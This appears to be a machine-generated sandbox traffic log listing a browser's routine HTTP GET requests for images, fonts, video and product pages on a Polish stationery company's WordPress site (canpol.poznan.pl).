Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/12/gift-1167274_1920-1000x1000.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/smyk_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/01/mickey2-500x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/12/wedding-album-1205692_1920-500x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/toysrus_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/01/www-kwadrat-notesy-500x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2016/02/city_1.mp4 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoReferer: https://canpol.poznan.pl/en/Accept-Language: en-US,en;q=0.9Cookie: pll_language=enRange: bytes=0-
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/auchan_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/polomarket_glowna_thumb.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/img/transparent.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/fonts/OpenSans-Regular-webfont.woff HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://canpol.poznan.plsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://canpol.poznan.pl/wp-content/themes/salient/style.css?ver=7.6Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/12/circles-1008411_1920-500x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2016/02/city_1.mp4 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoReferer: https://canpol.poznan.pl/en/Accept-Language: en-US,en;q=0.9Cookie: pll_language=enRange: bytes=6488064-6517919If-Range: "6374a0-620a8e5d215d7"
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/01/mickey2-500x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/fonts/fontawesome-webfont.woff?v=4.2 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://canpol.poznan.plsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://canpol.poznan.pl/wp-content/themes/salient/css/font-awesome.min.css?ver=4.6.3Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/css/fonts/icomoon.woff HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://canpol.poznan.plsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://canpol.poznan.pl/wp-content/themes/salient/style.css?ver=7.6Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/01/www-kwadrat-notesy-500x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/12/wedding-album-1205692_1920-500x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/12/gift-1167274_1920-1000x1000.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2016/08/canpol_ico.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2016/02/city_1.mp4 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoReferer: https://canpol.poznan.pl/en/Accept-Language: en-US,en;q=0.9Cookie: pll_language=enRange: bytes=39878-6488063If-Range: "6374a0-620a8e5d215d7"
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2016/08/canpol_ico.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /en/notebooks/ HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2017/03/Disney.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/notebooks/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/01/mickey_cr.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/notebooks/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/img/no-portfolio-item-wide.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/notebooks/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2017/03/Disney.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /en/notebooks/ HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/notebooks/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/01/NB5-96K-.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/notebooks/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/img/no-portfolio-item-wide.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/01/mickey_cr.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/01/NB5-96K-.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /en/albums/ HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://canpol.poznan.pl/en/notebooks/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /en/albums/ HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/albums/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/klejone.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/albums/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/samoprzylepne-500x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/albums/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/okazjonalne-553x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/albums/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/rozne.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/albums/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/disneyszyte.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/albums/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/disneyklejone-500x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/albums/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/disneyzgrzewane-500x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/albums/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/okazjonalne-553x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/disneyszyte.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/img/no-portfolio-item-tiny.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/albums/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
